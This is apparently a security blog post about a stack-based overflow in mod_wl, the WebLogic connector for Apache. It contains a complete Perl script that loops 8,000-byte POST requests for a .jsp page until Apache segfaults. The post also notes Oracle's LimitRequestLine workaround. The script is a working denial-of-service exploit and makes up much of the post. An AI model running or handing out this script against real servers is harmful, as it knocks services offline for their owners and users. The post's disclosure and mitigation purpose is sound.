This post was delayed in release due to sensitivity.

This vulnerability was a pretty fun one just because it affected so many people and it was just so simple to do.

This vulnerability is your standard stack based overflow. This particular overflow occurs in mod_wl which is a WebLogic connector for Apache. The overflow occurs when you send a long POST request for a .jsp. I started to look at KingCopes code but it just didn’t seem to work in my environment. So based off his code for the DOS, I wrote the one below to test with, nothing fancy.

use IO::Socket;
use strict;
 
my $port = $ARGV[1];
my $host = $ARGV[0];
 
my $dos=0;
 
while(1) {
 
 if ($dos eq 1) {
  "Server is down\n";
          exit;
 }
 
 $a = "A" x 8000;
 my $sock = IO::Socket::INET->new(PeerAddr => $host,
                                         PeerPort => $port,
                                         Proto => 'tcp');
 print $sock "POST /index.jsp $a\r\n\r\nHost: localhost\r\n\r\n";
 
 read($sock,$_,100); 
 print "=>" . $_ . "<=\n\n";
        if (!($_ =~ /Server/)) {
                        $dos = 1;
                }
 close($sock);        
}

The code above will seg fault Apache. The endless loop is needed because Apache recovers so quickly and it was an easy way to perform the DOS(took a couple of minutes). I have not had much time but I would like to explore this further and start debugging to see if code can be executed in a Linux environment.

Fix:
After all of my testing the workaround that was recommended by Oracle does work. They have not released a patch at this time.

With the workaround in place I even tried the DOS by sending a POST of 3999 to not trigger the LimitRequestLine. Apache handled the large repeating requests like a champ.

Workaround in apache conf:
LimitRequestLine 4000

http://www.milw0rm.com
http://cve.mitre.org
http://www.frsirt.com